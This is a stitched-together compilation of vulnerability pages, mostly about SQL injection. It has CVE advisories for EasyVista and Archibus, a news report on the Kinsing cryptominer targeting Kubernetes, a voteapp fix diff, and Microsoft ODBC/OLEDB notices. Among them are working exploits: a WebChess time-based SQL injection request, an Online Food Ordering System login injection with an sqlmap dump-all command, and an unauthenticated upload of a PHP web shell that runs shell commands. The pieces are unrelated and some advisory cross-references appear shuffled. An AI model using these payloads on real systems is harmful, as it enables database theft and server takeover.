WebChess through 0.9.0 and 1.0.0.rc2 allows SQL injection: mainmenu.php, chess.php, and opponentspassword.php (txtFirstName, txtLastName).

**webchess\_sqli\_poc**

1.  register 1 new user with password:123
2.  login as the new user
3.  click "personal" on the left
4.  file in the form (do not change password) and submit, intercept the packet, record the PHPSESSID
5.  modify origin/Referer/PHPSESSID, then send the following malicious packet:

POST /webchess/mainmenu.php HTTP/1.1

Host: 127.0.0.1

Content-Length: 216

Cache-Control: max-age=0

sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"

sec-ch-ua-mobile: ?0

sec-ch-ua-platform: "Linux"

Upgrade-Insecure-Requests: 1

Origin: http://127.0.0.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://127.0.0.1/webchess/mainmenu.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: PHPSESSID=0h36rka0b1ijafmi9enqn3cjat

Connection: close

txtFirstName=test11&txtLastName=%27+or+updatexml%280%2Cconcat%280x7e%2C%28select+\*+from+%28select%28sleep%2810%29%29%29a%29%29%2C0%29+or+%27&pwdOldPassword=123&pwdPassword=123&pwdPassword2=123&ToDo=UpdatePersonalInfo

6.  The server will be hanged for 10s

CVE-2023-22959: GitHub - chenan224/webchess_sqli_poc

An issue was discovered in EasyVista 2020.2.125.3 and 2022.1.109.0.03 before 2022.1.110.1.02. One parameter allows SQL injection.

**Abstract Advisory Information**

One of the parameters is vulnerable to SQL injections.

Author: Valentin Giannini & Alexis Pain

**Version affected**

Name: Easy Vista

Versions: 2020.2.125.3 & 2022.1.109.0.03

**Common Vulnerability Scoring System**

7.7

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

**Patch**

2022.1.110.1.02

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38492

**Vulnerability Disclosure Timeline**

*   17/05/2022: Vulnerability discovery
*   18/05/2022: Vulnerability Report to CERT-XLM
*   19/05/2022: Vulnerability Report to Vendor through Contact Form
*   24/05/2022: Vulnerability Report to Vendor through investigation at “supptech@easyvista.com”
*   24/05/2022: Vulnerability Report to Vendor through Contact Form
*   03/06/2022: Vulnerability Report to Vendor through investigation at “supptech@easyvista.com”
*   03/06/2022: Vulnerability Report to Vendor through Contact Form
*   03/06/2022: Vendor called, redirect us to support team08/07/2022: Vulnerability Report to Vendor through investigation at multiple contact point
*   25/07/2022: Vulnerability Report sent to Vendor through multiple investigations at security contact point
*   25/07/2022: Phonecall with Vendor
*   19/08/2022: Updates asked to vendor through multiple investigations
*   19/08/2022: Updates received from Vendor, fix is done **(now awaiting fix for other CVE)**
*   20/08/2022: Request CVE ID to Mitre
*   20/08/2022: CVE IDs assigned
*   26/08/2022: Updates asked to vendor
*   02/09/2022: Updates asked to vendor and CVE ID sent to vendor
*   05/09/2022: Meeting with vendor to prepare the publication
*   30/09/2022: Updates asked to vendor
*   04/10/2022: Multiple calls attempts to the vendors
*   31/10/2022: Expected Vulnerability disclosure

Our website uses cookies technologies to assist with navigation and your ability to provide feedback, analyze your use of our products and services, to enable you to use the social media functionalities and assist with our promotional and marketing efforts, and provide content from third parties. You may choose to opt-out from all non-essential cookie or allow them for a better browsing experience. For more information on the use of cookies, Please check our Privacy Notice ACCEPT REJECT

CVE-2022-38492: CVE-2022-38492 - Excellium Services

An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application accepts a user-controlled parameter that is used to create an SQL query. It causes this service to be prone to SQL injection.

**Abstract Advisory Information**

A service exposed by the application accepts a user-controlled parameter that is used to create an SQL query. It causes this service to be prone to SQL injection vulnerability.

Author: Dominique Righetto

**Version affected**

Name: Archibus Web Central

Versions: 2022.03.01.107

**Common Vulnerability Scoring System**

6.5

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

**Patch**

_none_

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45165

**Vulnerability Disclosure Timeline**

*   29/07/2022: Vulnerability discovery
*   29/07/2022: Vulnerability Report to CERT-XLM
*   29/07/2022: Vulnerability Report to Vendor through Contact Form
*   29/07/2022: Vulnerability Report to Vendor through Investigation and Contact form
*   12/08/2022: Vulnerability Report to Vendor through Investigation
*   19/08/2022: Vulnerability Report to Vendor through Investigation and Contact form
*   22/08/2022: Vulnerability Report to Vendor through contact point
*   24/08/2022: Update asked to contact point
*   02/09/2022: Vulnerability Report to Vendor through contact point
*   06/09/2022: Acknowledge from vendor, update and explanation of the disclosure process sent to vendor.
*   10/11/2022: Request CVE ID to Mitre
*   18/11/2022: CVE IDs assigned CVE-2022-45165
*   30/11/2022: Vulnerability disclosure

Our website uses cookies technologies to assist with navigation and your ability to provide feedback, analyze your use of our products and services, to enable you to use the social media functionalities and assist with our promotional and marketing efforts, and provide content from third parties. You may choose to opt-out from all non-essential cookie or allow them for a better browsing experience. For more information on the use of cookies, Please check our Privacy Notice ACCEPT REJECT

CVE-2022-45165: CVE-2022-45165 - Excellium Services

An issue was discovered in EasyVista 2020.2.125.3 and 2022.1.109.0.03. Some parameters allow SQL injection.

**Abstract Advisory Information**

Some parameters are prone to SQL injections.

Author: Valentin Giannini & Alexis Pain

**Version affected**

Name: EasyVista

Versions: 2020.2.125.3 & 2022.1.109.0.03

**Common Vulnerability Scoring System**

9.6

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

**Patch**

2020.2.125.3 & 2022.1.109.0.03

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38490

**Vulnerability Disclosure Timeline**

*   17/05/2022: Vulnerability discovery
*   18/05/2022: Vulnerability Report to CERT-XLM
*   19/05/2022: Vulnerability Report to Vendor through Contact Form
*   24/05/2022: Vulnerability Report to Vendor through investigation at “supptech@easyvista.com”
*   24/05/2022: Vulnerability Report to Vendor through Contact Form
*   03/06/2022: Vulnerability Report to Vendor through investigation at “supptech@easyvista.com”
*   03/06/2022: Vulnerability Report to Vendor through Contact Form
*   03/06/2022: Vendor called, redirect us to support team08/07/2022: Vulnerability Report to Vendor through investigation at multiple contact point
*   25/07/2022: Vulnerability Report sent to Vendor through multiple investigations at security contact point
*   25/07/2022: Phonecall with Vendor
*   19/08/2022: Updates asked to vendor through multiple investigations
*   19/08/2022: Updates received from Vendor, fix is done **(now awaiting fix for other CVE)**
*   20/08/2022: Request CVE ID to Mitre
*   20/08/2022: CVE IDs assigned
*   26/08/2022: Updates asked to vendor
*   02/09/2022: Updates asked to vendor and CVE ID sent to vendor
*   05/09/2022: Meeting with vendor to prepare the publication
*   30/09/2022: Updates asked to vendor
*   04/10/2022: Multiple calls attempts to the vendors
*   31/10/2022: Expected Vulnerability disclosure

Our website uses cookies technologies to assist with navigation and your ability to provide feedback, analyze your use of our products and services, to enable you to use the social media functionalities and assist with our promotional and marketing efforts, and provide content from third parties. You may choose to opt-out from all non-essential cookie or allow them for a better browsing experience. For more information on the use of cookies, Please check our Privacy Notice ACCEPT REJECT

CVE-2022-38490: CVE-2022-38490 - Excellium Services

The cryptomining malware, which typically targets Linux, is exploiting weaknesses in an open source container tool for initial access to cloud environments.

A malware that typically targets Linux environments for cryptocurrency mining has found a new target: vulnerable images and weakly configured PostgreSQL containers in Kubernetes that can be exploited for initial access, Microsoft has found.

Kinsing is a Golang-based malware best known for its targeting of Linux environments, but Microsoft researchers recently observed the Kinsing malware evolving its tactics, Microsoft security researcher Sunders Bruskin divulged in a recently published report. 

Kubernetes, meanwhile, has become the standard open source tool for managing enterprise application deployment mainly because it's cost-effective, offers autoscaling, and can run on any infrastructure. Indeed, 85% of IT leaders consider Kubernetes "extremely important" to cloud-native strategies.

That Kinsing would begin to find new ways to exploit Kubernetes clusters is on brand for the malware, especially because Kubernetes, like the cloud itself, is notoriously difficult to secure. Attackers have found multiple holes in Kubernetes — including the discovery of more than 380,000 open Kubernetes API servers exposed on the Internet — that have made it open season on cloud environments that use the management platform. Threat actors are even using compromised Kubernetes clusters to launch further malicious attacks.

"Exposing the cluster to the Internet without proper security measures can leave it open to attack from external sources," Bruskin acknowledged in the post.

**Targeting Vulnerable Container Images**

One of the new ways Kinsing is targeting Kubernetes environments is by targeting images that are vulnerable to remote code execution (RCE), the researchers found. This allows attackers with network access to exploit the container and run their malicious payload, they said.

In their observations, Microsoft researchers observed several application images frequently infected with Kinsing malware, including PHPUnit, Liferay, Oracle WebLogic, and WordPress, Bruskin wrote.

A series of high-severity vulnerabilities in WebLogic that Oracle revealed in 2020 — CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883 — have become particular targets of attackers wielding the Kinsing malware, which goes after unpatched WebLogic server images, researchers said.

Attacks begin with scanning of a wide range of IP addresses, looking for an open port that matches the WebLogic default port (7001), Bruskin revealed.

"If vulnerable, attackers can use one of the exploits to run their malicious payload (Kinsing, in this case)," he wrote, using a malicious command.

**PostgreSQL in the Crosshairs**

Microsoft researchers also recently observed a significant amount of Kubernetes clusters running PostgreSQL containers that were infected with Kinsing. They attributed the infections to attackers targeting several common misconfigurations that expose these servers, they said.

One is to use the "trust authentication" setting to configure these containers, which means PostgreSQL will assume that anyone who can connect to the server is authorized to access the database with whatever database user name they specify.  
"However, in some cases, this range is wider than it should be or even accepts connections from any IP address (i.e. 0.0.0.0/0)," Bruskin explained in the post. "In such configurations, attackers can freely connect to the PostgreSQL servers without authentication, which may lead to code execution."

Some network configurations in Kubernetes also are prone to Address Resolution Protocol (ARP) poisoning, which allows attackers to impersonate applications in the cluster. This means that even specifying a private IP address in the "trust" configuration may pose a security risk, the researchers said. ARP is the process of connecting a dynamic IP address to a physical machine's MAC address.

Indeed, as a general rule, configuring a PostgreSQL container to allow access to a broad range of IP addresses is exposing it to a potential threat, Bruskin warned.

Even if administrators don't configure it using an unsecured "trust authentication" method, attackers can brute-force PostgreSQL accounts, use denial-of-service (DoS) or distributed DoS (DDoS) attackers on the container's availability, or exploit the container and the database itself to compromise Kubernetes clusters, he wrote.

**Protecting the Enterprise Cloud**

Researchers offered both general rules of thumb for enterprises implementing Kubernetes environments and specific mitigations to avoid exposing them to attacks that target vulnerable images and common PostgreSQL misconfigurations.

In general, security teams must remain aware of exposed containers and vulnerable images and try to mitigate the risk before they are breached, Bruskin advised.

"Regularly updating images and secure configurations can be a game changer for a company when trying to be as protected as possible from security breaches and risky exposure," he wrote.

To mitigate the risk of implementing containers with vulnerable images, organizations can take several steps when deploying an image to the container, the researchers said. The first is to ensure that the image is from a known registry and that it's been patched and updated to the latest version, they said.

Organizations should also scan all images for vulnerabilities, identifying which ones are vulnerable and what those vulnerabilities are, especially the ones that are used in exposed containers. Finally, the researchers said, minimizing access to the container by assigning access to specific IPs and applying the "least privileges" rule to the user can also prevent attackers from exploiting vulnerable images in Kubernetes environments.

Microsoft: Kinsing Targets Kubernetes via Containers, PostgreSQL

A vulnerability was found in mapoor voteapp. It has been rated as critical. Affected by this issue is the function create_poll/do_poll/show_poll/show_refresh of the file app.py. The manipulation leads to sql injection. The name of the patch is b290c21a0d8bcdbd55db860afd3cadec97388e72. It is recommended to apply a patch to fix this issue. VDB-217790 is the identifier assigned to this vulnerability.

@@ -36,17 +36,15 @@ def create\_poll(): try: cursor \= conn.cursor() uid \= request.remote\_addr import pdb pdb.set\_trace() vid \= str(int(time.time()\*100)) title, optn, l\_dsc \= parse\_req() optdsc \= '|'.join(l\_dsc) optnum \= '|'.join(\['0'\]\*optn) sql \= "insert into t\_vote\_info(FUid, FVoteId, FTitle, FOptionNum, \\ FOptionDesc, FOptionVoteNum, FState, FCreateTime, FEndTime) \\ values(\\"%s\\",\\"%s\\",\\"%s\\",%d,\\"%s\\",\\"%s\\",0,now(),now()+interval 1 day);" values(%s,%s,%s,%s,%s,%s,0,now(),now()+interval 1 day);" param \= (uid, vid, title, optn, optdsc, optnum) res \= cursor.execute(sql%param) res \= cursor.execute(sql, param) conn.commit() cursor.close() except Exception,e: @@ -58,8 +56,8 @@ def do\_poll(): if "p\_id" in request.args: p\_id \= request.args\['p\_id'\] cursor \= conn.cursor() sql\_s \= "select FTitle, FOptionDesc from t\_vote\_info where FVoteId=%s;"%p\_id res \= cursor.execute(sql\_s) sql\_s \= "select FTitle, FOptionDesc from t\_vote\_info where FVoteId=%s;" res \= cursor.execute(sql\_s, (p\_id,)) r \= cursor.fetchone() cursor.close() title \= r\[0\] @@ -75,13 +73,13 @@ def do\_poll(): p\_id \= request.form\['p\_id'\] try: cursor \= conn.cursor() sql\_s \= "select FOptionVoteNum from t\_vote\_info where FVoteId=%s;"%p\_id res \= cursor.execute(sql\_s) sql\_s \= "select FOptionVoteNum from t\_vote\_info where FVoteId=%s;" res \= cursor.execute(sql\_s, (p\_id,)) opt\_pre \= cursor.fetchone()\[0\].split('|') opt\_pre\[o\_id\] \= str(int(opt\_pre\[o\_id\])+1) opt\_new \= '|'.join(opt\_pre) sql\_u \= "update t\_vote\_info set FOptionVoteNum=\\"%s\\" where FVoteId=\\"%s\\";"%(opt\_new,p\_id) res \= cursor.execute(sql\_u) sql\_u \= "update t\_vote\_info set FOptionVoteNum=%s where FVoteId=%s;" res \= cursor.execute(sql\_u, (opt\_new,p\_id)) conn.commit() cursor.close() except Exception,e: @@ -98,8 +96,8 @@ def show\_poll(): rows \= \[\] try: cursor \= conn.cursor() sql\_s \= "select FTitle,FOptionDesc,FOptionVoteNum,FState,FEndTime from t\_vote\_info where FVoteId=%s;"%p\_id res \= cursor.execute(sql\_s) sql\_s \= "select FTitle,FOptionDesc,FOptionVoteNum,FState,FEndTime from t\_vote\_info where FVoteId=%s;" res \= cursor.execute(sql\_s, (p\_id,)) r \= cursor.fetchone() cursor.close() title \= r\[0\] @@ -121,8 +119,8 @@ def show\_refresh(): rows \= \[\] try: cursor \= conn.cursor() sql\_s \= "select FTitle,FOptionDesc,FOptionVoteNum,FState,FEndTime from t\_vote\_info where FVoteId=%s;"%p\_id res \= cursor.execute(sql\_s) sql\_s \= "select FTitle,FOptionDesc,FOptionVoteNum,FState,FEndTime from t\_vote\_info where FVoteId=%s;" res \= cursor.execute(sql\_s, (p\_id,)) r \= cursor.fetchone() cursor.close() title \= r\[0\]

CVE-2014-125073: prevent sql injection · mapoor/voteapp@b290c21

Online Food Ordering System version 2.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Food Ordering System v2 - Sql Injection (Time-Based Blind)# Date: 01/10/2023# Exploit Author: Anıl Kızıltan# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code# Version: 2.0 # Tested on: Macos / XAMPP# username parameter is vulnerable to sql injection. You can exploit this sqlmap command: (First save this raw request as req.txt)# sqlmap -r req.txt -p username --dump-all####### Raw Request #######POST /fos/admin/ajax.php?action=login HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 32Origin: http://localhostConnection: closeReferer: http://localhost/fos/admin/login.phpCookie: language=en; welcomebanner_status=dismiss; continueCode=LoPJXWEAqruytmUYHrT4FDiBZikOH1Vh8Zh7JHvLtppI9VCvXHEYd7ywQ1B5; cookieconsent_status=dismiss; PHPSESSID=eje1menuonpvjtfbl2ri965btkSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originusername='-sleep(1)-'&password=a

Online Food Ordering System 2.0 SQL Injection

Online Food Ordering System version 2.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Online Food Ordering System v2 - Remote Code Execution (RCE) (Unauthenticated)  
# Date: 01/10/2023  
# Exploit Author: Hakan Sonay  
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code  
# Version: 2.0   
# Tested on: Windows 10 / XAMPP

############## Unauthenticated File Upload Request ##############

POST /fos/admin/ajax.php?action=save_settings HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0  
Accept: */*  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------19276025152284567381240485635  
Content-Length: 831  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/fos/admin/index.php?page=site_settings  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="name"

Online Food Ordering System V2  
-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="email"

info@sample.com  
-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="contact"

+6948 8542 623  
-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="about"

<p>shell command:</p><p>/assets/img/<file_name>.php?cmd=whoami</p>  
-----------------------------19276025152284567381240485635  
Content-Disposition: form-data; name="img"; filename="rev_shell.php"  
Content-Type: text/php

<?php   
echo system($_GET['cmd']);  
?>

-----------------------------19276025152284567381240485635--

############## Command Execution Request ##############

http://localhost/fos/assets/img/****rev_shell.php?cmd=[Payload]

Online Food Ordering System 2.0 Shell Upload

**How could an attacker exploit this vulnerability?**

An attacker could exploit the vulnerability by tricking an authenticated user into attempting to connect to a malicious SQL server via ODBC, which could result in the server receiving a malicious networking packet. This could allow the attacker to execute code remotely on the client.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20221213**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20221213)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-21732: Microsoft ODBC Driver Remote Code Execution Vulnerability

**How could an attacker exploit this vulnerability?**

An attacker could exploit the vulnerability by tricking an authenticated user into attempting to connect to a malicious SQL server via OLEDB, which could result in the server receiving a malicious networking packet. This could allow the attacker to execute code remotely on the client.

Tag

#sql